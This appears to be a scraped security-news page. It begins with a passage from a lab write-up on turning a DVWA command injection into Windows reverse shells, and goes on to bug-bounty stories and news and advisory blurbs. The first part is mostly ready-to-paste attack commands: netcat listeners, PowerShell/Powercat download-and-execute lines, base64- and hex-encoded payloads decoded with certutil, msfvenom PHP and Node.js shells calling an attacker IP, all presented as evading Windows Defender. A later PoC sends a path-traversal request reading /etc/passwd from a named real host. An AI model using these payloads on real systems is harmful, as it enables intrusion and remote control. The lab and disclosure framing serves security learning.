we triggered the command injection vulnerability. In addition to the pipe character ''|'', the slash character ''/'' is not filtered.Next, we will use the command injection vulnerability to setup a reverse shell using Powershell with the Powercat payload (https://github.com/besimorhino/powercat) and certutile.Why PowerShell and certutil.exe?The answer is simple: both PowerShell and certutil.exe are shipped with most Windows versions. You will find Powershell and certutile.exe in Windows 7 or higher.In the next sections, we will setup the following Powershell reverse shells:Plaintext Powershell/Powercat (DVWA low)Base64 encoded Powershell/Powercat (DVWA high)Hexadecimal encoded Powershell/Powercat(DVWA highIn the last section, we will combine multiple reverse shells that are not detected by Windows Defender:Base64 encoded multiple languages (DVWA high)Hexadecimal encoded multiple languages (DVWA high)PlaintextIn my first blog post ever (https://medium.com/system-weakness/evade-windows-defender-reverse-shell-detection-6fa9f5eee1d1) I showed you how you can use Powercat to set up an undetected reverse shell. The actual Powershell command is executed in ‘plaintext’, but the Powercat payload is Base64 encoded. This method still works today!The Powercat payload needs to be steamed over the network. This means that on our attacker machine, in addition to a netcat listener, we will need a web listener.Because of input filtering, this ‘plaintext Powershell/Powercat payload’ only works on the DVWA security level Low. Let go ahead!2. Performed on Kali Linux.Set up a netcat listener.nc -nlvp 443You need to stop and restart this netcat listener after every new encoding technique in this PoC.3. Performed on Kali Linux.Launch a PHP web server. Open a new Bash terminal tab use copy and paste the following code:php -S 0.0.0.0:80 -t /tmpLeave this web server open for the remainder of part 1 of this PoC.4. Performed on Kali Linux.Create encoded Powercat reverse shell payload. Open a Bash terminal use copy and paste the following code (adjust the ip-address to you Kali Linux address):attacker=172.16.78.251portnc=443rshell=shell-443.txtpwsh -c "iex (New-Object System.Net.Webclient).DownloadString(''https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'');powercat -c $attacker -p $portnc -e cmd.exe -ge" > /tmp/$rshellOur result is the following file in the webroot:/tmp/shell-443.txt5. Performed against vulnerable web server, Windows DVWA (Security Level=Low).Download the Powercat code with (plaintext) Powershell. Add the plaintext Powershell payload to the command line injection vulnerability. Use the pipe ''|'' for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|powershell /c $code=(New-Object System.Net.Webclient).DownloadString(''http://172.16.78.251:80/shell-443.txt'');iex ''powershell -E $code''Check out your web server. The Powercat file should be downloaded.Check out your netcat listener. A reverse shell connection is successful.Stop and restart the netcat listener.In the next section, we will use different encoding techniques for the Powershell / Powercat reverse shell. This enables us to set up a reverse shell when the DVWA security level is set to High.Base64 encodingYou may already be familiar with the base64 encoding technique. It converts every 3 bytes into 4 bytes ASCII format. The advantage is that the payload remains relatively short and special characters are neutralized. The base64 can be decoded with Powershell or the certutil.exe tool. Both these tools are present in Windows 7 or higher. The disadvantage of base64 is the usage of the “+” character. In a URL (GET request), the ‘+’ is seen as a space and must be additionally encoded to %2B.The base64 encode payload works up to the DVWA security level High.Note: step 2 should be performed. That means the file /tmp/shell-443.txt is stell in the webroot:6. Performed on Kali Linux.Create Base64 encoded Powershell reverse shell payload. Open a Bash terminal use copy and paste the following code (adjust the ip-address to you Kali Linux address):attacker=172.16.78.251portweb=80rshell=shell-443.txtecho START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString(''http://${attacker}:${portweb}/${rshell}'');iex ''powershell -E \$code''"| base64 -w 0 | tr -d ''\n\r''Our result is the following string:U1RBUlQgL0IgcG93ZXJzaGVsbCAtYyAkY29kZT0oTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xNzIuMTYuNzguMjUxOjgwL3NoZWxsLTQ0My50eHQnKTtpZXggJ3Bvd2Vyc2hlbGwgLUUgJGNvZGUnCg==We will use this string in step 7.7. Performed against vulnerable web server, Windows DVWA (Security Level=High).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|echo [paste Base64 code]>b64.txt|certutil /f /decode b64.txt powercat_shell.bat|START powercat_shell.batOur payload to get a reverse shell:127.0.0.1|echo U1RBUlQgL0IgcG93ZXJzaGVsbCAtYyAkY29kZT0oTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xNzIuMTYuNzguMjUxOjgwL3NoZWxsLTQ0My50eHQnKTtpZXggJ3Bvd2Vyc2hlbGwgLUUgJGNvZGUnCg==>b64.txt|certutil /f /decode b64.txt powercat_shell.bat|START powercat_shell.batCheck out your web server. The Powercat file should be downloaded.Check out your netcat listener. A reverse shell connection is set up.Stop and restart the netcat listener.Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure.127.0.0.1|echo+[paste Base64 code]>b64.txt|certutil+/f+/decode+b64.txt+powercat_shell.bat|START+powercat_shell.batHexadecimal encodingWith certutil.exe it is possible to hexadecimal characters back to plaintext. This technique works well and payload only includes the digits.Note: step 2 should be performed. That means the file /tmp/shell-443.txt is still in the webroot of our temporary PHP web server:8. Performed on Kali Linux.Create hexadecimal encoded Powershell reverse shell payload. Open a Bash terminal use copy and paste the following code (adjust the ip-address to you Kali Linux address):attacker=172.16.78.251portweb=80rshell=shell-443.txtecho START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString(''http://${attacker}:${portweb}/${rshell}'');iex ''powershell -E \$code''"| xxd --ps | tr -d ''\n\r''Our result is the following string:5354415254202f4220706f7765727368656c6c202d632024636f64653d284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2d3434332e74787427293b6965782027706f7765727368656c6c202d452024636f6465270aWe will use this string in step 9.9. Performed against vulnerable web server, Windows DVWA (Security Level=High).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|echo [paste hexadecimal code]>hex.txt|certutil /f /decode hex.txt hex_shell.bat|START hex_shell.batOur payload to get a reverse shell:127.0.0.1|echo 5354415254202f4220706f7765727368656c6c202d632024636f64653d284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2d3434332e74787427293b6965782027706f7765727368656c6c202d452024636f6465270a>hex.txt|certutil /f /decodehex hex.txt hex_shell.bat|START hex_shell.batCheck out your web server. The Powercat file should be downloaded.Check out your netcat listener. A reverse shell connection is set up.Stop the netcat listener.Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure:127.0.0.1|echo+[paste hexadecimal code]>hex.txt|certutil+/f+/decode+hex.txt+hex_shell.bat|START+hex_shell.batPart 2: Concatenate multiple reverse shellsAll Windows versions since Windows 7 are shipped with Powershell and certutil.exe. However, you may encounter a system with no access to Powershell or certutil.exe. For example this could be a nice ‘rabbit hole’ in a CtF competition or in an exam. In the next section, I will show you how to use the hexadecimal encoding technique with multiple Windows reverse shells. We are talking abount Powershell/Powercat, PHP/metasploit and NodeJS. All three are not detected by Windows Defender. If you want to, you can add extra payload like ‘hoax’ shell (https://github.com/t3l3machus/hoaxshell).We will start the whole procedure from scratch.10. Performed on Kali Linux.Open a Bash terminal. Rename this terminal to “web server”. Execute the command below to start simple python web server:python -m http.server -b 0.0.0.0 80 -d /tmpNote: our payload is not compatible with a temporary PHP server (step 3).11. Performed on Kali Linux.Open another Bash terminal. Rename this terminal to “netcat”. Execute the command below to start a netcat listener.nc -nlvp 44312. Performed on Kali Linux.Add encoded Powercat reverse shell code to the web root (same as step 2). Open a Bash terminal tab, use copy and paste to generate Powercat reverse shell code:attacker=172.16.78.251portnc=443rshell=shell-443.txtpwsh -c "iex (New-Object System.Net.Webclient).DownloadString(''https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'');powercat -c $attacker -p $portnc -e cmd.exe -ge" > /tmp/$rshell13. Performed on Kali Linux.Add PHP reverse shell code to the web root. In a Bash terminal, use copy and paste to generate Metasploit PHP reverse shell code:attacker=172.16.78.251portnc=443msfvenom -p php/reverse_php LHOST=$attacker LPORT=$portnc -f raw > /tmp/reverse_php.php14. Performed on Kali Linux.Create a shells_windows.txt file. This files includes ‘stealth’ reverse shell code Powershell (Powercat), PHP and NodeJS. Open a Bash terminal use copy and paste the following code:attacker=172.16.78.251 portnc=443portweb=80cat << EOF > /tmp/shells_windows.txtphp -d allow_url_fopen=true -r "eval(file_get_contents(''http://${attacker}:${portweb}/reverse_php.php''));"powershell -c \$code=(New-Object System.Net.Webclient).DownloadString(''http://${attacker}:${portweb}/shell-443.txt'');iex ''powershell -E \$code''echo (function(){var net = require(''net''),cp = require(''child_process''),sh = cp.spawn(''cmd'', []);var client = new net.Socket();client.connect(${portnc}, ''${attacker}'', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/; // Prevents > c:/Windows/Tasks/node_shell.jsecho })(); >>c:/Windows/Tasks/node_shell.jsnode c:/Windows/Tasks/node_shell.jsexitEOF15. Performed on Kali Linux.Create different encoded representations of the text file from step 13. Open a Bash terminal use copy and paste the following code:Base64cat /tmp/shells_windows.txt | base64 -w 0 | tr -d ''\n\r''Hexadecimalcat /tmp/shells_windows.txt | xxd --ps | tr -d ''\n\r''Hexadecimal presentation of /tmp/shells_windows.txtResult:We can use the following hexadecimal code in our payload:706870202d6420616c6c6f775f75726c5f666f70656e3d74727565202d7220226576616c2866696c655f6765745f636f6e74656e74732827687474703a2f2f3137322e31362e37382e3235313a38302f726576657273655f7068702e7068702729293b220a706f7765727368656c6c202d632024636f64653d284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2d3434332e74787427293b6965782027706f7765727368656c6c202d452024636f646527200a6563686f202866756e6374696f6e28297b766172206e6574203d207265717569726528276e657427292c6370203d207265717569726528276368696c645f70726f6365737327292c7368203d2063702e737061776e2827636d64272c205b5d293b76617220636c69656e74203d206e6577206e65742e536f636b657428293b636c69656e742e636f6e6e656374283434332c20273137322e31362e37382e323531272c2066756e6374696f6e28297b636c69656e742e706970652873682e737464696e293b73682e7374646f75742e7069706528636c69656e74293b73682e7374646572722e7069706528636c69656e74293b7d293b72657475726e202f612f3b202f2f2050726576656e7473203e20633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a6563686f207d2928293b203e3e633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a6e6f646520633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a657869740aWe will use this string in step 16.16. Performed against vulnerable web server, Windows DVWA (Security Level=High).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|echo [paste hexadecimal code]>h.txt|certutil /f /decodehex h.txt multiple_shells.bat|START multiple_shells.batOur statement to get a reverse shell:127.0.0.1|echo 706870202d6420616c6c6f775f75726c5f666f70656e3d74727565202d7220226576616c2866696c655f6765745f636f6e74656e74732827687474703a2f2f3137322e31362e37382e3235313a38302f726576657273655f7068702e7068702729293b220a706f7765727368656c6c202d632024636f64653d284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2d3434332e74787427293b6965782027706f7765727368656c6c202d452024636f646527200a6563686f202866756e6374696f6e28297b766172206e6574203d207265717569726528276e657427292c6370203d207265717569726528276368696c645f70726f6365737327292c7368203d2063702e737061776e2827636d64272c205b5d293b76617220636c69656e74203d206e6577206e65742e536f636b657428293b636c69656e742e636f6e6e656374283434332c20273137322e31362e37382e323531272c2066756e6374696f6e28297b636c69656e742e706970652873682e737464696e293b73682e7374646f75742e7069706528636c69656e74293b73682e7374646572722e7069706528636c69656e74293b7d293b72657475726e202f612f3b202f2f2050726576656e7473203e20633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a6563686f207d2928293b203e3e633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a6e6f646520633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a657869740a>h.txt|certutil /f /decodehex h.txt multiple_shells.bat|START multiple_shells.batCheck out your web server. The PHP payload file should be downloaded first (on top of our list).Check out your netcat listener. A (php) reverse shell connection is set up.17. Optional: Performed on Kali Linux.We have a reverse shell based on php. This is because php is our first shell in /tmp/shells_windows.txt. You can trigger the next reverse shell by starting another netcat listener (nc -nvlp 443) in a new terminal tab, than exit the current php reverse shell.You can see the next connection (Powershell / Powercat) in terminal tab ‘netcat 2’.Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure.127.0.0.1|echo+[paste hexadecimal code]>h.txt|certutil+/f+/decodehex+h.txt+multiple_shells.bat|START+multiple_shells.batMitigationsBlock all outgoing connections except for specific ports and remote IP addresses for required services. To achieve this, use sandboxing or run your servers in minimal containers. Configure proxy servers with restricted and tightly controlled destinations.Referenceshttps://github.com/digininja/DVWAhttps://portswigger.net/web-security/os-command-injectionhttps://github.com/besimorhino/powercatWindows reverse shell that (almost) always works. was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

1. HardwareContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Mastering these commands will empower you to effectively investigate and respond to network security incidentsContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Nmap (Network Mapper) is one of the most powerful and widely-used open-source tools for network discovery and security auditing. It’s a…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

IDOR x Bank = Exposed bank balance.Alright people, let’s do this one last time.I’m Manav Bankatwala, and I’m a security researcher. I’m not sure what kind of radioactive spider bit me, but it gave me the power to see security vulnerabilities everywhere.Summary:The vulnerability I am describing in this writeup is quite old, which I found way back when I was active in bug bounty. Imagine you are asking for money back from your friend, and he/she says, I am broke. But you found out that he/she is lying because you can hack into and see the actual bank balance of your friend. Ahaa, you got him.It’s a very simple vulnerability, but due to the impact I feel to write about it. So, the vulnerability here we are talking about is an IDOR (Insecure Direct Object Reference). I found this vulnerability in one of India’s fastest-growing digital banks. With this IDOR, I was able to see the actual bank balance of any user using their bank account number. Yes, you heard that right. Maybe I saw your bank balance? Haha😉Background:So, every month I download my bank statements to see the expenses and manage them. One afternoon, after hunting on a bug bounty program, I thought to log into my bank account and download my statement. But after completing the whole statement download thing, I realized that I forgot to turn off the interception proxy. Due to this, all the requests were captured. I thought to just let it go, but it made me curious and think if I could find any security vulnerability, and I did find it.Methodology:I didn’t want to do much aggressive testing and things like that, so just to keep it simple, I decided to look for IDORs in all the API requests that have account numbers as a parameter.Opened the burp suite search tab.I entered my own account number, which gave me a list of endpoints where my account number was provided as a parameter.Out of all, I found an API endpoint at /api/account/v1/m-balance.It was a post request, and the JSON body was having my account number.Request5. I sent this request to repeater and changed the last two digits of my account number. Upon sending, instead of an error, it gave me the balance of another user bank account number.ResponseTo further test this, I simply sent the request to the intruder and iterated a list of bank account numbers. And ya, I got the bank balance of all the users with just one click. Without wasting time, I made a report and submitted it to the authorities.But guess what? Banks don’t think that account balance is a sensitive thing to get exposed to. The replied, “Through an API, an authenticated user can only enumerate the balance of an account number; no other customer details are exposed through an API. After analyzing the issue, we have categorized it as of ‘Low’ severity.”Conclusion:Do you think that bank balance exposure is really not a concern? It’s like posting your bank balance on a notice board. Are you okay if your bank balance is listed on that notice board where anyone can see it? Let me know what are your views on this and in what more this could have been exploited. Until that, adiósFollow me to get latest updates:https://www.linkedin.com/in/manavbankatwala/https://www.instagram.com/manav.bug/https://twitter.com/manavbankatwalaWould you mind to tell me what your bank balance is? No? Okay, I’ll hack it. was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Author- Satyam PathaniaContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Discovering CVE-2024–24919 in Sony’s Check Point Quantum GatewayAs a security researcher, I’m always on the lookout for vulnerabilities in systems, and this time, my journey led me to the Sony HackerOne program. While testing Sony’s Check Point Quantum Gateway, I stumbled upon CVE-2024–24919, an information disclosure vulnerability that allows attackers to access sensitive server information. The best part? My work on this vulnerability ended up earning me some awesome Sony swag!Here’s how I discovered the vulnerability and what its impact could be on systems still exposed to it.The DiscoveryWhile participating in the Sony HackerOne program, I discovered a significant issue in the Check Point Quantum Gateway. The flaw was found in a vulnerable endpoint at https://x15.sonydadc.com/clients/MyCRL. This particular configuration involves the IPSec VPN, remote access VPN, or mobile access software blade, and allows an attacker to access sensitive files stored on the server.Understanding the VulnerabilityBug Name: Check Point Quantum Gateway — Information DisclosureBug Priority: HighVulnerable URL: https://x15.sonydadc.com/clients/MyCRLCVE Description:CVE-2024–24919 is an information disclosure vulnerability that can allow attackers to access certain information on internet-connected Gateways that have been configured with IPSec VPN, remote access VPN, or mobile access software blade. This could result in sensitive data, such as source code or configuration files, being exposed.ImpactThe impact of this vulnerability could be severe, as attackers may gain access to:Local files on the web server, including configuration files and sensitive dataApplication source code or internal secretsSensitive information such as database connection strings or access tokensProof of Concept (POC)To automate the process of checking for this vulnerability, I developed a Python tool that makes it easier to test endpoints:Tool:pip install CVE-2024-24919CVE-2024-24919 -u https://x15.sonydadc.comHere’s a sample POC HTTP Request showing the vulnerability in action:POST /clients/MyCRL HTTP/1.1Host: x15.sonydadc.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36Connection: closeContent-Length: 39Accept-Encoding: gzip, deflateaCSHELL/../../../../../../../etc/passwdThe server response reveals the sensitive file /etc/passwd:HTTP/1.0 200 OKadmin:x:0:0::/home/admin:/bin/bashmonitor:x:102:100:Monitor:/home/monitor:/etc/cli.shRemediationTo mitigate this issue, affected servers should ensure that the latest security patches from Check Point are applied and access controls are updated to prevent unauthorized access to sensitive resources.ConclusionThis vulnerability demonstrates how even trusted systems, like Sony’s Quantum Gateway, can expose sensitive data if not properly secured. The Sony HackerOne program has been an exciting platform to collaborate with, and finding this vulnerability earned me some cool swag as a reward for responsible disclosure!POC by: @karthithehackerMail: contact@karthithehacker.comWebsite: https://www.karthithehacker.com/If you’re interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com.For enrolling my cybersecurity and Bugbounty course,WhatsApp +91 82709 13635.Connect with me:Twitter: https://twitter.com/karthithehackerInstagram: https://www.instagram.com/karthithehacker/LinkedIn: https://www.linkedin.com/in/karthikeyan--v/Website: https://www.karthithehacker.com/Github : https://github.com/karthi-the-hacker/npmjs: https://www.npmjs.com/~karthithehackerYoutube: https://www.youtube.com/@karthi_the_hackerThank youKarthikeyan.VA Story About How I Found CVE-2024–24919 in Sony’s HackerOne Program (and Ended Up Getting Swag) was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

by ComputerWeekly

Active exploits aimed at firewalls mark yet another string of attacks targeting devices with high-value initial access, researchers said.

by Cybersecurity Dive

New malware variants hit the threat landscape all the time. Malware authors continuously modify code in order to avoid detection, and develop variants that can exploit security vulnerabilities before they’re patched. Innovations in malware are also developed to exploit new technologies and platforms; and to improve the capabilities of existing malware with enhanced functionality, making variants that are increasingly sophisticated. Today’s malware is often designed on a modular architecture, which means developers can easily switch, add, or modify components – without having to rework the entire architecture. This means that new variants (with more advanced or more targeted capabilities) can emerge very quickly. And the availability of automated tools for creating and deploying malware is accelerating the generation of new threats – creating a landscape that is increasingly difficult for cybersecurity firms to monitor. Here are three new malware variants causing disruption for victims right now. 1. Cuckoo Spear Researchers at Cybereason have uncovered Cuckoo Spear, a threat actor linked with the APT10 group. Stealthy operations appear to have been underway for up to three years – with an advanced persistent threat (APT) that conducts cyber espionage. Cuckoo Spear is a new collective term for LODEINFO and NOOPDOOR which have been found to be connected. Cuckoo Spear leverages both of these malware variants for persistent network infiltration and data exfiltration. Cybereason’s team have explored the sophisticated capabilities of Cuckoo Spear, which include decryption mechanisms, modular architecture, and DGA-based C2 communication. 2. Flame Stealer Flame Stealer, first uncovered in April 2024, is a comprehensive data thief – with the capabilities to steal a range of sensitive data. A tweet by ThreatMon notes that it can capture login information, passwords, credit card details, and PayPal information; and it claims to be undetectable by antivirus tools. It then instantly transmits stolen data to a specific Telegram channel or webhook. Once it has infected a system, it remains active via automatic re-injection. Importantly, it’s been found to target a number of popular digital platforms, including Spotify, Instagram, TikTok, and Discord. So it poses a significant risk for a high volume of users. And it’s also capable of stealing digital wallet data and capturing Two-Factor Authentication codes when a user enters them, further compromising users’ security online. 3. MacOS malware disguised as an Unarchiver app Unarchiver apps are used all the time, and digital users trust them as a means to extract archived files. But this trust can be abused by threat actors who plant malware into unarchiver downloads. Security analysts at Hunt.io recently discovered a phishing site disguised as a popular unarchiver app – with only a slightly modified domain name and download button to set the fake unarchiver site apart from the real one. A grabber zip file was found to contain 10 shell scripts with the purpose of stealing using data. The first script sets up a directory in the user’s library folder, collects IP information, and then executes the other data-grabbing scripts; before transmitting compressed, stolen data to a remote server. Users must be vigilant and implement security updates As we continue to see new malware threats emerge on the threat landscape globally, it’s critical that all digital users have access to actionable cybersecurity education. They need to know what to look for – so they can stay vigilant. At the same time, software updates should be installed routinely to avoid leaving vulnerabilities unpatched. P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!

by HACKLIDO

The report by IANS Research and Artico Search shows security priorities are clashing with economic realities.  

by Cybersecurity Dive

Cisco Talos is disclosing a new threat called “DragonRank” that primarily targets countries in Asia and a few in Europe, operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation.

by Cisco Talos Blog

It takes more than technical knowledge to write about cybersecurity in a way people want to read. It takes creativity, discipline, and other key skills.

by Dark Reading

With the country expected to hold its general elections soon, the bill is touted to provide safeguards against digitally manipulated content.

by ZDNET Security

Briefly exploring core concepts around Node API security with regards to GraphQL and REST API design with code examples specific to Node.js application servers.

by Node.js Security

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-43461.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Microsoft SharePoint. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2024-43466.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-38249.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft SharePoint. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-38018.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Photoshop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-43760.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe After Effects. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39381.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Premiere Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39384.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Media Encoder. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39377.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Adobe After Effects. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2024-39382.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Adobe Premiere Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2024-39385.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Audition. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39378.

by Zero Day Initiative Advisories

Windows heap overflow (@esj4y), Linux TCP UAF (@v4bel), Goffloader (@BouncyHat), Intune lat-movement (@h4wkst3r), browser attack detection (@mega_spl0it), and more!

by Bad Sector Labs

A novel side-channel attack has been found to leverage radio signals emanated by a device''s random access memory (RAM) as a data exfiltration mechanism, posing a threat to air-gapped networks. The technique has been codenamed RAMBO (short for ""Radiation of Air-gapped Memory Bus for Offense"") by Dr. Mordechai Guri, the head of the Offensive Cyber Research Lab in the Department of Software

by The Hacker News

Explore Unit 42''s review of North Korean APT groups and their impact, detailing the top 10 malware and tools we''ve seen from these threat actors. The post Threat Assessment: North Korean Threat Groups appeared first on Unit 42.

by Palo Alto Networks - Unit42

CISA has added CE-2024-40766 to its known exploited vulnerabilities catalog.

by ITPro Today

Workers now supports more NPM packages and Node.js APIs using an overhauled hybrid compatibility layer.

by Cloudflare

In this short data-driven talk, learn how to not only improve your security awareness / culture program but grow your career and improve your happiness at work. The post Convene Chats – Top Action Items from the SANS 2024 Security Awareness Report: Its All About You appeared first on National Cybersecurity Alliance.

by National Cybersecurity Alliance

Researchers at Malwarebytes warn of a surge in election-themed scams ahead of November’s presidential election in the US. These attacks can be expected to increase as the election grows closer.

by KnowBe4

Threat actors are opting for malicious links over attachments in email-based attacks because it gives them a critical advantage that many solutions can’t address.

by KnowBe4

CISA has added CVE-2024-40766 to its Known Exploited Vulnerabilities catalog.

by Dark Reading

Zimperium’s Zero-Day defense against a sophisticated Android malware campaign involving SpyAgent, a spyware strain designed to steal cryptocurrency credentials. The post Unmasking SpyAgent: Zimperium’s Zero-Day Defense Against Cryptocurrency Theft appeared first on Zimperium.

by Zimperium

The attack signals a new shift in RansomHub''s arsenal of tools.

by ThreatDown

Though the company reports that data was exfiltrated in the breach, it has been remained tightlipped regarding the kind of data that was exposed.

by Dark Reading

The proliferation of cybersecurity tools has created an illusion of security. Organizations often believe that by deploying a firewall, antivirus software, intrusion detection systems, identity threat detection and response, and other tools, they are adequately protected. However, this approach not only fails to address the fundamental issue of the attack surface but also introduces dangerous

by The Hacker News

The Colombian insurance sector is the target of a threat actor tracked as Blind Eagle with the end goal of delivering a customized version of a known commodity remote access trojan (RAT) referred to as Quasar RAT since June 2024. ""Attacks have originated with phishing emails impersonating the Colombian tax authority,"" Zscaler ThreatLabz researcher Gaetano Pellegrino said in a new analysis

by The Hacker News

The China-linked advanced persistent threat (APT) group known as Mustang Panda has been observed weaponizing Visual Studio Code software as part of espionage operations targeting government entities in Southeast Asia. ""This threat actor used Visual Studio Code''s embedded reverse shell feature to gain a foothold in target networks,"" Palo Alto Networks Unit 42 researcher Tom Fakterman said in a

by The Hacker News

GenAI has become a table stakes tool for employees, due to the productivity gains and innovative capabilities it offers. Developers use it to write code, finance teams use it to analyze reports, and sales teams create customer emails and assets. Yet, these capabilities are exactly the ones that introduce serious security risks. Register to our upcoming webinar to learn how to prevent GenAI data

by The Hacker News

Explore industry moves and significant changes in the industry for the week of September 9, 2024. Stay updated with the latest industry trends and shifts.

by SecurityWeek

This week on the Lock and Code podcast, we speak with Eva Galperin about the arrest of Telegram''s CEO and how it impacts security and privacy.

by Malwarebytes Labs

Designed to be more than a one-time assessment— Wing Security’s SaaS Pulse provides organizations with actionable insights and continuous oversight into their SaaS security posture—and it’s free! Introducing SaaS Pulse: Free Continuous SaaS Risk Management  Just like waiting for a medical issue to become critical before seeing a doctor, organizations can’t afford to overlook the constantly

by The Hacker News

Progress Software has released security updates for a maximum-severity flaw in LoadMaster and Multi-Tenant (MT) hypervisor that could result in the execution of arbitrary operating system commands. Tracked as CVE-2024-7591 (CVSS score: 10.0), the vulnerability has been described as an improper input validation bug that results in OS command injection. ""It is possible for unauthenticated, remote

by The Hacker News

When Office 2024 is released next month, ActiveX controls will be off by default in client apps like Word, Excel, and PowerPoint.

by ThreatDown

Android device users in South Korea have emerged as a target of a new mobile malware campaign that delivers a new type of threat dubbed SpyAgent. The malware ""targets mnemonic keys by scanning for images on your device that might contain them,"" McAfee Labs researcher SangRyol Ryu said in an analysis, adding the targeting footprint has broadened in scope to include the U.K. The campaign makes use

by The Hacker News

A flaw in the design of WhatsApp''s ""View Once"" privacy feature let''s anyone save pictures and videos that should be ephemeral. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

by Hive Five

